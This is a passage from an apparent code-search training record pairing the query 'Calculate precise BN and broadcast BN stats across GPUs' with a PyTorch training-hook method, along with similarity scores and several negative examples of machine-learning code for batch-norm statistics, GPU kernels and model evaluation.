self.ms_ry_pos_out[l] + one_m_gamma * self.dc_dry_pos_out[l]**2\n self.ms_rx_neg_out[l] = gamma * self.ms_rx_neg_out[l] + one_m_gamma * self.dc_drx_neg_out[l]**2\n self.ms_ry_neg_out[l] = gamma * self.ms_ry_neg_out[l] + one_m_gamma * self.dc_dry_neg_out[l]**2\n\n layer.b += -self.alpha * self.dc_db[l] / np.sqrt(self.ms_b[l] + epsilon)\n layer.q += -self.alpha * self.dc_dq[l] / np.sqrt(self.ms_q[l] + epsilon)\n\n layer.rx_inp += -self.alpha * self.dc_drx_inp[l] / np.sqrt(self.ms_rx_inp[l] + epsilon)\n layer.ry_inp += -self.alpha * self.dc_dry_inp[l] / np.sqrt(self.ms_ry_inp[l] + epsilon)\n\n layer.rx_pos_out += -self.alpha * self.dc_drx_pos_out[l] / np.sqrt(self.ms_rx_pos_out[l] + epsilon)\n layer.ry_pos_out += -self.alpha * self.dc_dry_pos_out[l] / np.sqrt(self.ms_ry_pos_out[l] + epsilon)\n layer.rx_neg_out += -self.alpha * self.dc_drx_neg_out[l] / np.sqrt(self.ms_rx_neg_out[l] + epsilon)\n layer.ry_neg_out += -self.alpha * self.dc_dry_neg_out[l] / np.sqrt(self.ms_ry_neg_out[l] + epsilon)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def evaluation(net, n_way, k_query, mdl_file, repnet, imgsz, batchsz):\n\t# we need to test 11788 - 8855 = 2933 images.\n\tdb = Cub('../CUB_200_2011_ZL/', n_way, k_query, train=False, episode_num= 1000//n_way//k_query, imgsz=imgsz)\n\tdb_loader = DataLoader(db, 1, shuffle=True, num_workers=1, pin_memory=True)\n\n\taccs = []\n\tfor batch in db_loader:\n\t\tx = Variable(batch[0]).cuda()\n\t\tx_label = Variable(batch[1]).cuda()\n\t\tatt = Variable(batch[2]).cuda()\n\t\tatt_label = Variable(batch[3]).cuda()\n\n\t\t# prepare for following procedure.\n\t\treal_batchsz = x.size(0)\n\t\tsetsz = x.size(1)\n\n\t\t# [b, setsz, c, h, w] => [b*setsz, c, h, w]\n\t\tx = x.view(real_batchsz * setsz, 3, imgsz, imgsz)\n\t\t# [small batch, c, h, w]\n\t\tx_chunks = torch.chunk(x, batchsz * n_way, dim=0)\n\t\tfeatures = []\n\t\tfor img in x_chunks:\n\t\t\t# [small batch, 512, 1, 1] => [small batch, 512]\n\t\t\tfeature = repnet(img).view(img.size(0), 512)\n\t\t\tfeatures.append(feature)\n\t\t# [b*setsz, 512] => [real batch, setsz, 512]\n\t\tx = torch.cat(features, dim=0).view(real_batchsz, setsz, 512)\n\t\t# detach gradient !!!\n\t\tx = x.detach()\n\n\t\tpred, correct = net(x, x_label, att, att_label, False)\n\t\tcorrect = correct.sum().data[0] # multi-gpu\n\n\t\t# preds = torch.cat(preds, dim= 1)\n\t\tacc = correct / ( x_label.size(0) * x_label.size(1) )\n\t\taccs.append(acc)\n\n\t\t# if np.random.randint(10)<1:\n\t\t# \tprint(pred[0].cpu().data.numpy(), att_label[0].cpu().data.numpy())\n\tprint(accs)\n\n\t# compute the distribution of 600/episodesz episodes acc.\n\tglobal best_accuracy\n\taccuracy = np.array(accs).mean()\n\tprint('<<<<<<<<< %d way accuracy:'%n_way, accuracy, 'best accuracy:', best_accuracy, '>>>>>>>>')\n\n\tif accuracy > best_accuracy:\n\t\tbest_accuracy = accuracy\n\t\ttorch.save(net.state_dict(), mdl_file)\n\t\tprint('Saved to checkpoint:', mdl_file)\n\n\treturn accuracy", "def inference():\n inf_dataset = dataset\n net.eval()\n frames_gen, frame_cnt, rel_props, 
prop_ticks, prop_scaling = inf_dataset[index]\n \n num_crop = args.test_crops\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n # First get the base_out outputs\n base_output = torch.autograd.Variable(torch.zeros((num_crop, frame_cnt, base_out_dim)).cuda(),\n volatile=True)\n cnt = 0\n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crops * 3, 224, 224]\n # frame_batch_size is 4 by default\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda(),\n volatile=True)\n base_out = net(input_var, None, None, None, None)\n bsc = base_out.view(num_crop, -1, base_out_dim)\n base_output[:, cnt:cnt+bsc.size(1), :] = bsc\n cnt += bsc.size(1)\n\n n_frames = base_output.size(1)\n assert frame_cnt == n_frames\n # GLCU\n step_features = base_output.mean(dim=0).mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred = net.glcu(step_features)\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0).data.cpu().numpy()\n gate = gate.repeat(1, num_crop * n_frames).view(num_crop, n_frames, base_out_dim)\n if net.additive_glcu:\n base_output = base_output + gate\n else:\n base_output = base_output * gate\n\n # output.shape == [num_frames, 7791]\n output = torch.zeros((frame_cnt, output_dim)).cuda()\n cnt = 0\n for i in range(0, frame_cnt, 4):\n base_out = base_output[:, i:i+4, :].contiguous().view(-1, base_out_dim)\n rst = net.test_fc(base_out)\n sc = rst.data.view(num_crop, -1, output_dim).mean(dim=0)\n output[cnt: cnt + sc.size(0), :] = sc\n cnt += sc.size(0)\n base_output = base_output.mean(dim=0).data\n\n # act_scores.shape == [num_proposals, K+1]\n # comp_scores.shape == [num_proposals, K]\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling)\n act_scores = torch.autograd.Variable(act_scores, volatile=True)\n comp_scores = torch.autograd.Variable(comp_scores, volatile=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0).data.cpu().numpy()\n\n act_scores = act_scores.data\n comp_scores = comp_scores.data\n\n if reg_scores is not None:\n reg_scores = reg_scores.view(-1, num_class, 2)\n reg_scores[:, :, 0] = reg_scores[:, :, 0] * stats[1, 0] + stats[0, 0]\n reg_scores[:, :, 1] = reg_scores[:, :, 1] * stats[1, 1] + stats[0, 1]\n\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n\n # perform stpp on scores\n return ((inf_dataset.video_list[index].id,\n (rel_props.numpy(), act_scores.cpu().numpy(), comp_scores.cpu().numpy(), reg_scores.cpu().numpy(), \n glcu_task_pred, task_pred),\n output.cpu().numpy(),\n base_output.cpu().numpy()))", "def _comput_PSNR(self, input, target):\n shave = 4\n ch, h, w = input.size()\n input_Y = rgb2ycbcrT(input.cpu())\n target_Y = rgb2ycbcrT(target.cpu())\n diff = (input_Y - target_Y).view(1, h, w)\n\n diff = diff[:, shave:(h - shave), shave:(w - shave)]\n mse = diff.pow(2).mean()\n psnr = -10 * np.log10(mse)\n return psnr" ]
[ "0.6702836", "0.60820144", "0.57397383", "0.5513961", "0.5449203", "0.5389235", "0.53726816", "0.5317791", "0.5255269", "0.5254749", "0.5192296", "0.517288", "0.51403135", "0.5121367", "0.51208645", "0.51208645", "0.511794", "0.51084936", "0.5106065", "0.5099034", "0.5092202", "0.5073547", "0.50673836", "0.50488716", "0.50338435", "0.502055", "0.5012428", "0.501089", "0.5002971", "0.49716663", "0.49546856", "0.49401686", "0.49401686", "0.4932358", "0.49209988", "0.49204868", "0.49184752", "0.4916693", "0.49037102", "0.48946956", "0.48838368", "0.48787674", "0.48730496", "0.48694572", "0.48672712", "0.48630452", "0.4860934", "0.48596287", "0.4851591", "0.48455057", "0.48454162", "0.48446012", "0.4840251", "0.48401853", "0.48350665", "0.4833516", "0.48317856", "0.48277622", "0.4827165", "0.48258263", "0.48231295", "0.48189723", "0.48168334", "0.48123232", "0.48073128", "0.47961852", "0.47952184", "0.47950086", "0.47944933", "0.47925803", "0.47901708", "0.47809064", "0.47799984", "0.47758543", "0.4772516", "0.47709933", "0.47695166", "0.47684658", "0.47676653", "0.4765633", "0.4762571", "0.47583732", "0.4757198", "0.47555423", "0.47536805", "0.4739716", "0.47355884", "0.47350612", "0.47327983", "0.4725364", "0.47251174", "0.4724747", "0.4724747", "0.4724747", "0.47242233", "0.47237417", "0.47237417", "0.47237417", "0.47230917", "0.4720603", "0.4719385" ]
0.0
-1
Calculate precise BN and broadcast BN stats across GPUs.
def after_train_iter(self,
                     runner,
                     batch_idx: int,
                     data_batch: DATA_BATCH = None,
                     outputs: Optional[dict] = None) -> None:
    # if using `IterBasedTrainLoop`, perform precise BN every
    # `self.interval` iters.
    if isinstance(runner.train_loop, IterBasedTrainLoop) and self.every_n_train_iters(
            runner, self.interval):
        self._perform_precise_bn(runner)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_precise_bn_stats(model, loader):\n # Compute the number of minibatches to use\n num_iter = min(cfg.BN.NUM_SAMPLES_PRECISE // loader.batch_size, len(loader))\n # Retrieve the BN layers\n bns = [m for m in model.modules() if isinstance(m, torch.nn.BatchNorm2d)]\n # Initialize stats storage\n mus = [torch.zeros_like(bn.running_mean) for bn in bns]\n sqs = [torch.zeros_like(bn.running_var) for bn in bns]\n # Remember momentum values\n moms = [bn.momentum for bn in bns]\n # Disable momentum\n for bn in bns:\n bn.momentum = 1.0\n # Accumulate the stats across the data samples\n for inputs, _labels in itertools.islice(loader, num_iter):\n model(inputs.cuda())\n # Accumulate the stats for each BN layer\n for i, bn in enumerate(bns):\n m, v = bn.running_mean, bn.running_var\n sqs[i] += (v + m * m) / num_iter\n mus[i] += m / num_iter\n # Set the stats and restore momentum values\n for i, bn in enumerate(bns):\n bn.running_var = sqs[i] - mus[i] * mus[i]\n bn.running_mean = mus[i]\n bn.momentum = moms[i]", "def update_bn_stats(\n model: nn.Module,\n loader: DataLoader,\n num_samples: int = 8192,\n logger: Optional[Union[logging.Logger, str]] = None) -> None:\n if is_model_wrapper(model):\n model = model.module\n\n # get dist info\n rank, world_size = mmengine.dist.get_dist_info()\n # Compute the number of mini-batches to use, if the size of dataloader is\n # less than num_iters, use all the samples in dataloader.\n num_iter = num_samples // (loader.batch_size * world_size)\n num_iter = min(num_iter, len(loader))\n # Retrieve the BN layers\n bn_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_BatchNorm))\n ]\n if len(bn_layers) == 0:\n print_log('No BN found in model', logger=logger, level=logging.WARNING)\n return\n print_log(\n f'{len(bn_layers)} BN found, run {num_iter} iters...', logger=logger)\n\n # Finds all the other norm layers with training=True.\n other_norm_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_InstanceNorm, GroupNorm))\n ]\n if len(other_norm_layers) > 0:\n print_log(\n 'IN/GN stats will not be updated in PreciseHook.',\n logger=logger,\n level=logging.INFO)\n\n # Initialize BN stats storage for computing\n # mean(mean(batch)) and mean(var(batch))\n running_means = [torch.zeros_like(bn.running_mean) for bn in bn_layers]\n running_vars = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n # Remember momentum values\n momentums = [bn.momentum for bn in bn_layers]\n # Set momentum to 1.0 to compute BN stats that reflect the current batch\n for bn in bn_layers:\n bn.momentum = 1.0\n # Average the BN stats for each BN layer over the batches\n if rank == 0:\n prog_bar = ProgressBar(num_iter)\n\n for data in itertools.islice(loader, num_iter):\n data = model.data_preprocessor(data, False)\n model(**data)\n\n for i, bn in enumerate(bn_layers):\n running_means[i] += bn.running_mean / num_iter\n running_vars[i] += bn.running_var / num_iter\n if rank == 0:\n prog_bar.update()\n\n # Sync BN stats across GPUs (no reduction if 1 GPU used)\n running_means = scaled_all_reduce(running_means, world_size)\n running_vars = scaled_all_reduce(running_vars, world_size)\n # Set BN stats and restore original momentum values\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_means[i]\n bn.running_var = running_vars[i]\n bn.momentum = momentums[i]", "def ComputeNrb(self):\r\n pass", "def _init_CodeRateAndPhaseBuffers(self):\n\n # Grid and blocks\n MAX_BLOCK_X = 1024 # current limit (32 warps of 32 threads = 1024 which 
is max block size x)\n numThreads = int(np.min((self.CUDA_WARP_SIZE * self.CUDA_NUM_WARPS, MAX_BLOCK_X))) # TODO: check with atomic operation to allow more than 32 warps\n \n self.block_codeMax = (numThreads,1,1)\n self.grid_codeMax = (1,1) # we only want one grid at the moment. Maybe 2 later, but need to implement atomic operation in the algorithm first!\n self.block_codeXCorrSum = (int(self.CUDA_NUM_THREADS/self.CUDA_NUM_SMX),1,1) # 1 block pr \n self.grid_codeXCorrSum = (int(self.CUDA_NUM_SMX*4),1) # Make some more grids than SMX's, so there is plenty to do for the GPU while it is waiting for data\n\n ## buffers\n self.GPU_bufCodeAndPhase = cuda.mem_alloc(int(self.Nfft*np.float32().nbytes)) # output of sum is real, In place R2C fft uses Nfft/2*complex64 bytes which is same length as Nfft*float32\n self.GPU_bufCodeAndPhaseOut = cuda.mem_alloc(int(self.Nfft*np.complex64().nbytes)) # for arrays of len >= 2**20, the in-place R2C transform does not seem to work\n self.GPU_buffers.append(self.GPU_bufCodeAndPhase)\n self.GPU_bufCodeAndPhaseResult = cuda.mem_alloc(np.float32().nbytes*3) # holds [index of max (offset complensated), argument of max (normalized), value of max]\n self.GPU_buffers.append(self.GPU_bufCodeAndPhaseResult)\n \n ## fft Plan\n self.fftPlan_codeRate_R2C = cufft.cufftPlan1d(self.Nfft,cufft.CUFFT_R2C,1) # R2C, 1 batch\n self.GPU_fftPlans.append(self.fftPlan_codeRate_R2C)\n\n ## CUDA kernels\n self.GPU_sumXCorrBuffMasks = self.CudaKernels.get_function('sumXCorrBuffMasks').prepare('PPi')\n self.GPU_findCodeRateAndPhase = self.CudaKernels.get_function('findCodeRateAndPhase').prepare('PPii')\n ## constants\n self.symsTolLow = 0.9*self.spsym # Ignore low symbol rates. avoids locking onto harmonics\n self.symsTolHigh = 1.1*self.spsym # Ignore high symbol rates (avoids false results due to slow noise and DC)\n\n self.codeRateAndPhaseOffsetLow = int(self.Nfft/self.symsTolLow)\n self.codeRateAndPhaseOffsetHigh = int(self.Nfft/self.symsTolHigh)\n ## numpy buffers\n self.__CodeRateAndPhaseResult = np.empty(3,dtype=np.float32) # holds [index of max (offset complensated), argument of max (normalized), value of max]", "def calc(self):\n self.proc_blocks = [cluster.cells for cluster in self.clusters]\n self.cell_loads = [sum([len(cell) for cell in self.proc_blocks])]\n self.particle_loads = [cluster.np for cluster in self.clusters]\n self.imbalance = LoadBalancer.get_load_imbalance(self.particle_loads)", "def __initializeKernels(self):\n # FFT plans:\n self.__initializeDopplerIfftPlan() # for Doppler Ifft\n self.__initializeDemodIfftPlan() # for demod \n self.__initializeSNRFftPlan() # for findSNR\n \n # GPU kernels\n kernel = self.CudaKernels\n ## kernels for initialization\n self.GPU_multInputVectorWithMasks = kernel.get_function('multInputVectorWithMasks').prepare('PPP')\n \n self.GPU_complexConj = kernel.get_function('complexConj').prepare('P')\n self.GPU_scaleComplexByScalar = kernel.get_function('scaleComplexByScalar').prepare('Pf')\n self.GPU_setComplexArrayToZeros = kernel.get_function('setComplexArrayToZeros').prepare('P')\n \n ## kernels for doppler search\n self.GPU_filterMasks = kernel.get_function('multInputVectorWithShiftedMasksDopp').prepare('PPPPii')\n # for multInputVectorWithShiftedMasks\n self.numBlocks = self.Nfft/self.numThreads\n self.bShapeVecMasks = (int(self.numThreads),1,1)\n self.gShapeVecMasks = (int(self.numBlocks),1)\n assert self.bShapeVecMasks[0]*self.gShapeVecMasks[0]==self.Nfft,'Dimension mismatch'\n\n self.GPU_absSumDoppler = 
kernel.get_function('blockAbsSumAtomic').prepare('PPi')\n # for the absSumKernel to sum the rows together\n self.bShapeAbsSum = (128,1,1) # 128 and 2 in next line is just picked TODO: should be config val\n self.gShapeAbsSum = (2,int(self.doppIdxArrayLen)) # tweak these\n\n assert self.Nfft % self.bShapeAbsSum[0]*self.gShapeAbsSum[0] == 0,'Nfft has to be dividable by block and grid dimensions'\n\n self.GPU_estDoppler = kernel.get_function('findDopplerEst').prepare('PPPii')\n # for the small kernel that finds the doppler\n self.bShapeDopp = (self.num_masks,1,1)\n self.gShapeDopp = (1,1)\n\n self.GPU_setArrayToZeros = kernel.get_function('setArrayToZeros').prepare('P')\n # for the set to zero kernel for the sum\n self.bShapeZero = (int(self.num_masks),1,1)\n self.gShapeZero = (int(self.doppIdxArrayLen),1)\n\n ## for demodulation\n self.bShapeVecMasks2 = (int(256),1,1) ## 256 is just picked, TODO: should be config val\n self.gShapeVecMasks2 = (int(self.Nfft/self.bShapeVecMasks2[0]),1)\n self.complexShiftMulMasks = kernel.get_function('multInputVectorWithShiftedMask').prepare('PPPi')\n self.complexHeterodyne = kernel.get_function('complexHeterodyne').prepare('PPfffi')\n self.findcentres = kernel.get_function('findCentres').prepare('PPPPffii')\n self.bShapeCentres = (256,1,1) ## 256 is just picked, TODO: should be config val", "def update(self, rxn_probs):\n pass", "def compute(self) -> Tensor:\n\n if self.samples:\n return self.average_precisions.float() / self.total\n else:\n # pred_image_indices = torch.cat(self.pred_image_indices, dim=0)\n pred_probs = torch.cat(self.pred_probs, dim=0)\n pred_labels = torch.cat(self.pred_labels, dim=0)\n pred_bboxes = torch.cat(self.pred_bboxes, dim=0)\n\n # target_image_indices = torch.cat(self.target_image_indices, dim=0)\n target_labels = torch.cat(self.target_labels, dim=0)\n target_bboxes = torch.cat(self.target_bboxes, dim=0)\n\n # pred_index = torch.nonzero((pred_labels == 1))\n # pred_probs = pred_probs[pred_index]\n # pred_bboxes = pred_bboxes[pred_index]\n # target_index = torch.nonzero((target_labels == 1))\n # target_bboxes = target_bboxes[target_index]\n\n\n # _, index_sorted = torch.sort(pred_probs)\n # pred_bboxes = pred_bboxes[index_sorted].cpu().detach().numpy()\n # target_bboxes = target_bboxes.cpu().detach().numpy()\n pred_probs = pred_probs.cpu().detach().numpy()\n pred_labels = pred_labels.cpu().detach().numpy()\n pred_bboxes = pred_bboxes.cpu().detach().numpy()\n target_labels = target_labels.cpu().detach().numpy()\n target_bboxes = target_bboxes.cpu().detach().numpy()\n\n pred_probs = pred_probs[pred_labels == 1]\n pred_bboxes = pred_bboxes[pred_labels == 1]\n target_bboxes = target_bboxes[target_labels == 1]\n\n preds_sorted_idx = np.argsort(pred_probs)[::-1]\n pred_bboxes = pred_bboxes[preds_sorted_idx]\n\n x, y = calculate_precision_recall(target_bboxes, pred_bboxes)\n\n if len(x) >= 2:\n return auc(x, y)\n else:\n return 0\n\n # return mean_average_precision(\n # pred_image_indices,\n # pred_probs,\n # pred_labels,\n # pred_bboxes,\n # target_image_indices,\n # target_labels,\n # target_bboxes,\n # self.iou_threshold,\n # self.ap_calculation,\n # )", "def reset_bn_stats(model):\n for m in model.modules():\n if isinstance(m, torch.nn.BatchNorm2d):\n m.reset_running_stats()", "def update_bn_stats(\n model: nn.Module,\n data_loader: Iterable[Any],\n num_iters: int = 200,\n by_epoch: bool = False):\n bn_layers = get_bn_modules(model)\n\n if len(bn_layers) == 0:\n return\n\n momentum_actual = [bn.momentum for bn in bn_layers]\n for bn 
in bn_layers:\n bn.momentum = 1.0\n\n running_mean = [\n torch.zeros_like(bn.running_mean) for bn in bn_layers\n ]\n running_var = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n\n if by_epoch:\n num_iters = num_iters * len(data_loader)\n\n iter_loader = IterLoader(data_loader)\n ind = -1\n with tqdm(total=num_iters) as pbar:\n pbar.set_description('Calculating running stats')\n while ind < num_iters:\n data_batch = next(iter_loader)\n output = model(data_batch['img'])\n\n ind += 1\n for i, bn in enumerate(bn_layers):\n running_mean[i] += (bn.running_mean - running_mean[i]) / (ind + 1)\n running_var[i] += (bn.running_var - running_var[i]) / (ind + 1)\n\n pbar.update(1)\n\n assert ind == num_iters, (\n \"update_bn_stats is meant to run for {} iterations, \"\n \"but the dataloader stops at {} iterations.\".format(num_iters, ind)\n )\n\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_mean[i]\n bn.running_var = running_var[i]\n bn.momentum = momentum_actual[i]", "def main():\n\n # Create an empty array to hold our points.\n n = gpuarray.zeros(shape=(x, y, z),\n dtype=gpuarray.vec.float3)\n\n # Populate the array with randomized points from the search space.\n for k in range(z):\n for j in range(y):\n for i in range(x):\n n[i, j, k] = gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-depth, depth))\n\n # Declare our elementwise CUDA kernel.\n mod = Elementwise(\n arguments=\"float3 pt, float3 *ns, float *rs\",\n operation=\"rs[i] = sqrt(pow(pt.x-ns[i].x,2)+pow(pt.y-ns[i].y,2)+pow(pt.z-ns[i].z,2))\",\n name=\"euclidean_distance\",\n preamble=\"#include <math.h>\"\n )\n\n # Declare an empty results array.\n r = gpuarray.zeros(shape=(50, 50, 2), dtype=numpy.float32)\n start = cuda.Event()\n end = cuda.Event()\n start.record()\n # Call the kernel with a randomize point from the search space.\n mod(gpuarray.vec.make_float3(random.uniform(-width, width),\n random.uniform(-height, height),\n random.uniform(-width, width)), n, r)\n end.record()\n end.synchronize()\n print((start.time_till(end)))\n print(r)", "def calcError(net, net_labels, dataset_name, dataloader, dataset, doGPU):\n # note: net_labels is a list of pairs (RAP_name, PETA_name) of attribute names\n net_attr_nbr = len(net_labels)\n assert (net_attr_nbr == 49)\n \n total = 0\n correct = 0\n batch_nbr = 0\n per_attrib_total = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_correct = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_1_pred = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_class_accuracy = torch.zeros([net_attr_nbr], dtype=torch.float) # size [92]\n if doGPU:\n per_attrib_total = per_attrib_total.cuda()\n per_attrib_correct = per_attrib_correct.cuda()\n per_attrib_1_pred = per_attrib_1_pred.cuda()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cuda()\n \n with torch.no_grad():\n # loop over batches\n # accumulate per-attribute and total number of correct predictions\n for i_batch, sample_batched in enumerate(dataloader):\n assert (sample_batched['image'].shape[1:] == (3,128,48)), \"wrong image size\"\n batch_nbr += 1\n real_batch_size = sample_batched['image'].shape[0]\n total += real_batch_size * net_attr_nbr\n per_attrib_total += real_batch_size # size [net_attr_nbr]\n assert (per_attrib_total.sum().item() == total)\n try:\n assert (batch_nbr == math.ceil(per_attrib_total[0].item()/Param_Batchsize))\n except AssertionError:\n ipdb.set_trace()\n pass\n\n\n # 
prepare data for prediction\n if doGPU:\n inp = Variable(sample_batched['image'].float().cuda())\n else:\n inp = Variable(sample_batched['image'].float())\n\n # retrieve ground truth\n dataset_lab_gt = sample_batched['label'] # shape == [50,NB_ATTRIB]\n\n # convert ground truth to model attributes\n if dataset_name == 'datasetRAPPETA':\n assert (dataset_lab_gt.shape[1] == 49)\n # no conversion needed, use ground truth as it is\n lab_gt = dataset_lab_gt\n elif dataset_name == 'datasetRAP':\n assert (dataset_lab_gt.shape[1] == 92)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_RAP = [rap_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_RAP):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n elif dataset_name == 'datasetPETA':\n assert (dataset_lab_gt.shape[1] == 104)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_PETA = [peta_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_PETA):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n else:\n print('Unknown dataset \\'' + dataset_name + '\\'')\n sys.exit(1)\n\n # 'format' ground truth for Torch\n lab_gtv = Variable(lab_gt)\n if doGPU:\n lab_gtv = lab_gtv.cuda()\n\n # do prediction\n logits = net.forward(inp) # output without Sigmoid\n predictions = (logits > 0).int() # size [50, net_attr_nbr]\n assert (net_attr_nbr == predictions.shape[1])\n\n # accumulate total number of correct predictions\n correct += (lab_gtv == predictions).sum()\n\n # accumulate per-attribute number of correct predictions\n per_batch_and_attrib_correct = (lab_gtv == predictions) # size [50, net_attr_nbr]\n #if doGPU:\n # per_batch_and_attrib_correct = per_batch_and_attrib_correct.cpu()\n per_attrib_correct += per_batch_and_attrib_correct.sum(0) # size [net_attr_nbr]\n assert (per_attrib_correct.sum().item() == correct)\n\n # accumulate number of 1 predictions for each attribute\n per_attrib_1_pred += predictions.sum(0) # size [net_attr_nbr]\n\n # accumulate for class-accuracy\n per_batch_and_attrib_1_good_prediction = (predictions.byte() * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_good_prediction = ((1 - predictions.byte()) * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n assert torch.equal(per_batch_and_attrib_1_good_prediction + per_batch_and_attrib_0_good_prediction, per_batch_and_attrib_correct.sum(0))\n per_batch_and_attrib_1_ground_truth = lab_gtv.sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_ground_truth = (1 - lab_gtv).sum(0) #size [net_attr_nbr]\n try:\n assert torch.equal(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth, torch.tensor([real_batch_size] * net_attr_nbr).cuda())\n except AssertionError:\n print(\"per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth=\")\n print(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth)\n ipdb.set_trace()\n pass\n\n per_batch_and_attrib_recall_1 = per_batch_and_attrib_1_good_prediction.float() / per_batch_and_attrib_1_ground_truth.float() #size [net_attr_nbr]\n # nan values appear when ground_truth 
number of 1 value is 0\n # in this case, good_prediction can not be different of 0\n # (there can not be a good prediction of 1 because there is not\n # any 1 in the ground truth)\n # so a nan appears only when recall = 0 good pred / 0 case in ground truth\n # so recall=nan can be safely replaced by a recall=1\n person.replace_nan_by_one(per_batch_and_attrib_recall_1)\n per_batch_and_attrib_recall_0 = per_batch_and_attrib_0_good_prediction.float() / per_batch_and_attrib_0_ground_truth.float() #size [net_attr_nbr]\n person.replace_nan_by_one(per_batch_and_attrib_recall_0)\n # class_accuracy = mean(recall_of_0, recall_of_1)\n per_batch_and_attrib_class_accuracy = (per_batch_and_attrib_recall_0 + per_batch_and_attrib_recall_1) / 2.0 #size [net_attr_nbr]\n per_attrib_class_accuracy += per_batch_and_attrib_class_accuracy #size [net_attr_nbr]\n\n assert (total == (dataloader.dataset.__len__() * net_attr_nbr))\n \n if doGPU:\n per_attrib_total = per_attrib_total.cpu()\n per_attrib_correct = per_attrib_correct.cpu()\n per_attrib_1_pred = per_attrib_1_pred.cpu()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cpu()\n\n # compute per-attribute and global average prediction error\n err = (1.0-correct.item()/total)\n per_attrib_err = (1.0 - (per_attrib_correct.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float))) # size [net_attr_nbr]\n np.testing.assert_allclose(per_attrib_err.mean().item(), err, rtol=1e-5)\n\n # compute per-attribute number of 1 predictions\n per_attrib_1_pred_rate = 100 * (per_attrib_1_pred.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float)) # size [net_attr_nbr]\n\n # compute mean class_accuracy over batches\n per_attrib_class_accuracy = per_attrib_class_accuracy * 1.0 / batch_nbr \n\n return err, per_attrib_err, per_attrib_1_pred_rate, per_attrib_class_accuracy", "def __call__(self, epoch, update):\n ii=1\n count = 0\n list = []\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n while True:\n i, p = next(self.gen)\n if p.poll():\n grads = []\n for i, fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs * 4)\n grads.append(np.ndarray(self.shapes[i], np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv()\n\n count += 1\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n staleness = update - last_update\n else:\n ii += 1\n if ii % self.learners == 0:\n time.sleep(0.0001)\n if count == self.num:\n binning = 0\n for i in self.bins:\n if staleness >= i:\n binning += 1\n else:\n break\n self.bin_counts[binning] += 1\n logger.debug(\"staleness\", staleness, \"put in bin\", binning, flush=True)\n return gradients_list, from_list, global_update_list, step_list, metrics_list, binning, 2", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in 
